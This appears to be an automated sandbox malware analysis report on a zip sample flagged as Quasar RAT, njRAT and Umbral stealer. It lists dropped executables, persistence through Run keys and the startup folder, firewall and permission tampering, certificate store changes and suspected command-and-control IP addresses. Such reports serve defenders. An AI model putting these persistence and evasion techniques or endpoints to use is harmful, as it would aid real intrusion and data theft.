Malware Analysis Report

2024-11-13 18:03

Sample ID 241108-k8svdsypbt
Target 240927-mh3m1sxgrm_pw_infected.zip
SHA256 de59c7b1cef753487469ad372c2dbebfa31043fc403aceeadbb24cab42e79889
Tags
pdf link quasar umbral njrat romka defense_evasion discovery evasion exploit persistence privilege_escalation ransomware spyware stealer trojan upx execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

de59c7b1cef753487469ad372c2dbebfa31043fc403aceeadbb24cab42e79889

Threat Level: Known bad

The file 240927-mh3m1sxgrm_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

pdf link quasar umbral njrat romka defense_evasion discovery evasion exploit persistence privilege_escalation ransomware spyware stealer trojan upx execution

Windows security bypass

Quasar family

njRAT/Bladabindi

Umbral

Quasar payload

Umbral family

Quasar RAT

UAC bypass

Njrat family

Detect Umbral payload

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Possible privilege escalation attempt

Drops file in Drivers directory

Manipulates Digital Signatures

Blocklisted process makes network request

.NET Reactor proctector

Unexpected DNS network traffic destination

Drops startup file

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Event Triggered Execution: Component Object Model Hijacking

Modifies file permissions

Password Policy Discovery

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Obfuscated Files or Information: Command Obfuscation

Adds Run key to start application

Looks up external IP address via web service

Sets desktop wallpaper using registry

UPX packed file

Suspicious use of SetThreadContext

AutoIT Executable

Enumerates processes with tasklist

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

HTTP links in PDF interactive object

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

System Location Discovery: System Language Discovery

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Program crash

NSIS installer

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Kills process with taskkill

Runs net.exe

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Runs regedit.exe

Delays execution with timeout.exe

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious behavior: AddClipboardFormatListener

NTFS ADS

Modifies Internet Explorer settings

Modifies registry class

Enumerates system info in registry

Scheduled Task/Job: Scheduled Task

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Gathers network information

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-08 09:18

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Njrat family

njrat

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral family

umbral

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

HTTP links in PDF interactive object

pdf link
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 09:16

Reported

2024-11-08 09:21

Platform

win7-20241023-en

Max time kernel

150s

Max time network

164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\vir.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Umbral family

umbral

njRAT/Bladabindi

trojan njrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\DRIVERS\SETE8D9.tmp C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\system32\DRIVERS\SETE8D9.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\droidcam.sys C:\Windows\system32\DrvInst.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = 0f00000001000000140000005499b4f34c6397ce83670cd84156bdc761f906b30200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000330035003000310063006100310064002d0032006600360064002d0034003600300036002d0061006500340037002d0035006400610061006500300037003100340061003600350000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000430e77033e527f42dc67bc6984d33d889a73f0cd200000000100000000030000308202fc308201e4a003020102021033edcc7a9050638b4ebed4f8f15b4a5b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313835385a180f32313234313031353039313835385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b82e6da8da56e44fb30c49a7bdc482bb9dca611d387f58526b4a0e5e0b800bf7aa47905e92ed1a6d124b929819391bad86059acb1771958341ec9d69e0747cc883709c117047778f4365d4f71b5645dfcc2430aab7b07a67af0bd67d382a98ac927f8410e76a7be57a9ed6a6e08c2604649c6a574c2c64fd4569f2b5d041985135c0c692a7f911205cfb5e5188cc5e4fa09ddb37caad8a808c6b735c929e705ec2201e91891eb72408769fd1949b24c53b87793cfbf1ece50b76b992723162930f19c81fa1ad81e6410813d3681e1d1f4768fceee7f035271ce4169150fae829aaf6b3f329b4753c9b33011326c1482c64a3aab54563fbafebc8c8e20dcffe790203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40504a4353444d52500030090603551d1304023000300d06092a864886f70d010105050003820101002b95f3244ef7172719b16e2c504a129ce40aa3eed42d8163b6387400c94562ee63249ca00e1cd91d6e3e5236941dd7fc1eea25e448201badc4186432fef63809b581790577b12dcfb0b167670a3d96cf55231fcb8c827f874e3e835bee7b68bffc8b9ebe67c9641746a8fce97480f40fd2ce8e7c26334f59a4d17c1e5822995877545d531fcac5a65e2b47ddee843edc79e0537e1cfdb0c35985912d82a67adf3ab01eb48bc64a69c9bcef6b9c42757e5aaf09c71f14f32c6205ee69753f7b70082ae0fdd3ebf152afce8f1977620b26a8946a4aaac5afb2ad1f5aedf6e2b80be614ce2f660dedbad3494c938771fbbcaf6daaa7f5c769f6a2db5a814d40c50b C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = 0f00000001000000140000005499b4f34c6397ce83670cd84156bdc761f906b3030000000100000014000000430e77033e527f42dc67bc6984d33d889a73f0cd0200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000330035003000310063006100310064002d0032006600360064002d0034003600300036002d0061006500340037002d0035006400610061006500300037003100340061003600350000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000200000000100000000030000308202fc308201e4a003020102021033edcc7a9050638b4ebed4f8f15b4a5b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313835385a180f32313234313031353039313835385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b82e6da8da56e44fb30c49a7bdc482bb9dca611d387f58526b4a0e5e0b800bf7aa47905e92ed1a6d124b929819391bad86059acb1771958341ec9d69e0747cc883709c117047778f4365d4f71b5645dfcc2430aab7b07a67af0bd67d382a98ac927f8410e76a7be57a9ed6a6e08c2604649c6a574c2c64fd4569f2b5d041985135c0c692a7f911205cfb5e5188cc5e4fa09ddb37caad8a808c6b735c929e705ec2201e91891eb72408769fd1949b24c53b87793cfbf1ece50b76b992723162930f19c81fa1ad81e6410813d3681e1d1f4768fceee7f035271ce4169150fae829aaf6b3f329b4753c9b33011326c1482c64a3aab54563fbafebc8c8e20dcffe790203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40504a4353444d52500030090603551d1304023000300d06092a864886f70d010105050003820101002b95f3244ef7172719b16e2c504a129ce40aa3eed42d8163b6387400c94562ee63249ca00e1cd91d6e3e5236941dd7fc1eea25e448201badc4186432fef63809b581790577b12dcfb0b167670a3d96cf55231fcb8c827f874e3e835bee7b68bffc8b9ebe67c9641746a8fce97480f40fd2ce8e7c26334f59a4d17c1e5822995877545d531fcac5a65e2b47ddee843edc79e0537e1cfdb0c35985912d82a67adf3ab01eb48bc64a69c9bcef6b9c42757e5aaf09c71f14f32c6205ee69753f7b70082ae0fdd3ebf152afce8f1977620b26a8946a4aaac5afb2ad1f5aedf6e2b80be614ce2f660dedbad3494c938771fbbcaf6daaa7f5c769f6a2db5a814d40c50b C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = 0f00000001000000140000005499b4f34c6397ce83670cd84156bdc761f906b3030000000100000014000000430e77033e527f42dc67bc6984d33d889a73f0cd200000000100000000030000308202fc308201e4a003020102021033edcc7a9050638b4ebed4f8f15b4a5b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313835385a180f32313234313031353039313835385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b82e6da8da56e44fb30c49a7bdc482bb9dca611d387f58526b4a0e5e0b800bf7aa47905e92ed1a6d124b929819391bad86059acb1771958341ec9d69e0747cc883709c117047778f4365d4f71b5645dfcc2430aab7b07a67af0bd67d382a98ac927f8410e76a7be57a9ed6a6e08c2604649c6a574c2c64fd4569f2b5d041985135c0c692a7f911205cfb5e5188cc5e4fa09ddb37caad8a808c6b735c929e705ec2201e91891eb72408769fd1949b24c53b87793cfbf1ece50b76b992723162930f19c81fa1ad81e6410813d3681e1d1f4768fceee7f035271ce4169150fae829aaf6b3f329b4753c9b33011326c1482c64a3aab54563fbafebc8c8e20dcffe790203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40504a4353444d52500030090603551d1304023000300d06092a864886f70d010105050003820101002b95f3244ef7172719b16e2c504a129ce40aa3eed42d8163b6387400c94562ee63249ca00e1cd91d6e3e5236941dd7fc1eea25e448201badc4186432fef63809b581790577b12dcfb0b167670a3d96cf55231fcb8c827f874e3e835bee7b68bffc8b9ebe67c9641746a8fce97480f40fd2ce8e7c26334f59a4d17c1e5822995877545d531fcac5a65e2b47ddee843edc79e0537e1cfdb0c35985912d82a67adf3ab01eb48bc64a69c9bcef6b9c42757e5aaf09c71f14f32c6205ee69753f7b70082ae0fdd3ebf152afce8f1977620b26a8946a4aaac5afb2ad1f5aedf6e2b80be614ce2f660dedbad3494c938771fbbcaf6daaa7f5c769f6a2db5a814d40c50b C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Google.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\regmess.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\the.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wimloader.dll N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe N/A
N/A N/A C:\Program Files (x86)\DroidCam\vc_redist.x86.exe N/A
N/A N/A C:\Program Files (x86)\DroidCam\vc_redist.x86.exe N/A
N/A N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\CLWCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A C:\Program Files (x86)\DroidCam\vc_redist.x86.exe N/A
N/A N/A C:\Program Files (x86)\DroidCam\vc_redist.x86.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 185.93.182.46 N/A N/A
Destination IP 74.208.156.127 N/A N/A
Destination IP 5.157.51.190 N/A N/A
Destination IP 172.105.221.253 N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\cmd.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Password Policy Discovery

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\infstrng.dat C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
File opened for modification C:\Windows\System32\DriverStore\infpub.dat C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
File opened for modification C:\Windows\System32\DriverStore\infstor.dat C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\infpub.dat C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\infstrng.dat C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.cat C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.inf C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\infpub.dat C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\System32\DriverStore\INFCACHE.0 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\infstrng.dat C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
File created C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.sys C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF C:\Windows\system32\DrvInst.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\CLWCP.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Winaero Tweaker\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files (x86)\DroidCam\DroidCamApp.exe C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\lib\insdrv.exe C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File opened for modification C:\Program Files\Winaero Tweaker\Elevator.exe C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-QLKRB.tmp C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-5TO3A.tmp C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-818V2.tmp C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-7KHEF.tmp C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files (x86)\DroidCam\adb\AdbWinApi.dll C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\plist.dll C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
